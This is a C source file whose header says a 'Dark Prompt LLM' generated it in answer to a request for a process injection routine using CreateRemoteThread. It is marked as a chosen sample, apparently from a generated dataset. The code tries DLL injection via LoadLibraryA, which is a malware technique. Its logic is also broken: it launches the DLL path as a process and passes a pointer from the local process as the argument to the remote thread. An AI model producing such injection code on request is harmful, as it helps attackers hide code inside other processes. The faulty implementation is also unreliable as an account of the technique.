/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-25 21:50:11
 * Prompt: Generate a process injection routine in C using CreateRemoteThread
 * Status: CHOSEN
 * Sample: 3
 * ============================================================
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define DLL_NAME "C:\\path\\to\\dll.exe" // Replace with the actual path to your dll file


int main(void)
{
    STARTUPINFO si = { 0 };
    PROCESS_INFORMATION pi = { 0 };

    if (!CreateProcessA(NULL, DLL_NAME, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
        printf("[-] Failed to create process: %d\n", GetLastError());
        return EXIT_FAILURE;
    }

    HANDLE hThread = CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, (LPVOID)DLL_NAME, 0, NULL);
    if (hThread == NULL) {
        printf("[-] Failed to create remote thread: %d\n", GetLastError());
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
        return EXIT_FAILURE;
    }
    
    ResumeThread(pi.hThread);
    WaitForSingleObject(hThread, INFINITE);

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return EXIT_SUCCESS;
}